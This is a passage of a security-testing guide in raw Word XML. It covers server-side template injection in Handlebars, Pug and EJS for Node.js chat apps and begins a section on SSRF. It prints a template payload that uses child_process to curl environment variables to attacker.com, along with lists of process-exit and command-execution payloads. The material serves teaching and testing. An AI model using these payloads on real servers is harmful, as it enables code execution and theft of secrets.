        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">compiled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userData)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This implementation appears reasonable for providing personalized user experiences. Users can customize their email format through profile settings, and the template engine handles variable substitution safely. The functionality works correctly for normal template patterns that users typically configure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But template engines like Handlebars, Pug, and EJS contain powerful features for accessing JavaScript runtime context during template processing. When user input controls template content, attackers can inject template syntax that accesses system functions, executes arbitrary code, or manipulates server state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker submits this template through your profile customization interface:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> maliciousTemplate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Welcome {{name}}!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{#with (lookup this 'constructor')}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  {{#with (lookup this 'constructor')}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    {{#with (lookup this 'prototype')}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      {{#with (lookup this 'constructor')}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        {{this 'require("child_process").exec("curl attacker.com/steal?data=" + JSON.stringify(process.env))'}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      {{/with}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    {{/with}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  {{/with}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{/with}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When your notification system processes this template, the Handlebars engine executes the embedded JavaScript code on your server. The malicious template accesses the Node.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">require()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function through prototype chain traversal, imports the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">child_process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">module, and executes arbitrary system commands. The attacker gains complete control over your chat server through a seemingly innocent email preference setting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your webhook integration system presents another template injection vector. Chat applications often integrate with external services like Slack, Discord, or custom webhooks that format user messages according to destination service requirements. These integrations typically use template engines to transform chat messages into appropriate formats for external APIs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Webhook integration with user-controlled formatting</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendWebhookNotification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webhookConfig) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> template </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webhookConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageTemplate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> templateEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">author</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">timestamp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendToWebhook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(webhookConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> rendered)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When users can control webhook templates through administration interfaces or integration configuration, template injection enables code execution in the context of your chat server. Administrative users configuring webhook integrations might not realize they’re providing input to template engines capable of executing arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Systematic Template Injection Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates template functionality using normal template patterns: variable substitution, conditional formatting, and loop constructs that work as intended. Developers verify that templates render user data correctly and produce expected output formats. Testing rarely explores template syntax designed to access runtime context or execute system functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Template injection payload generation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">generateTemplatePayloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fuzzer) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> handlebarsPayloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"{{constructor.constructor('return process')().exit()}}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"{{#with process}}{{exit}}{{/with}}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"{{lookup (lookup this 'constructor') 'constructo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pugPayloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"#{process.exit()}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"#{global.process.mainModule.require('child_process').exec('i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ejsPayloads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;%- process.exit() %&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;%- global.process.mainModule.require('child_process').exec('whoami') %&g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fuzzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mutateTemplateStructures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">handlebarsPayloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pugPayloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ejsPayloads</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s template processing provides multiple attack vectors for code execution testing. Email notification systems process user preference data through template engines. Webhook integrations format user messages according to configurable templates. Administrative reporting generates dynamic content with user-provided data. Bot integration systems might process user-defined response templates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The generation strategy focuses on template syntax that accesses JavaScript runtime context while remaining focused on your chat application’s specific template engine implementations. Test various context escape techniques: constructor chain climbing, prototype access, global object manipulation, and module system exploitation. Generate payloads targeting different template engines that your chat application might use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection requires monitoring template processing operations for code execution indicators rather than just syntax errors. Track system function access, module loading attempts, file system operations, and network requests initiated during template rendering. Verify that template processing doesn’t enable unauthorized access to Node.js runtime capabilities. Confirm that template injection actually achieves code execution rather than just causing template syntax errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template injection vulnerabilities become particularly dangerous in chat applications because template processing often occurs with elevated privileges in server-side context. Code execution through template injection enables complete server compromise, data access, and infrastructure manipulation. Single malicious templates can compromise your entire chat platform and associated infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach reveals whether your chat application’s template processing systems properly isolate user input from code execution context. Understanding template injection provides essential context for examining how external content fetching might expose internal network resources.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkStart w:id="119" w:name="Xa64944cf77b0490a47fd8c054e4967e3558d501"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF): When Chat Features Access Internal Networks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chat applications frequently fetch external content to enhance user experience: link previews for shared URLs, webhook integrations with external services, avatar image fetching from user-provided URLs, and integration with external APIs for rich content display. These features create opportunities for Server-Side Request Forgery attacks when your application makes requests based on user-controlled input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider your link preview functionality. Users share URLs in chat conversations, and your application automatically fetches webpage content to display rich previews with titles, descriptions, and images. This feature improves user experience by providing context about shared links without requiring users to navigate away from the chat interface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> axio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axios'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
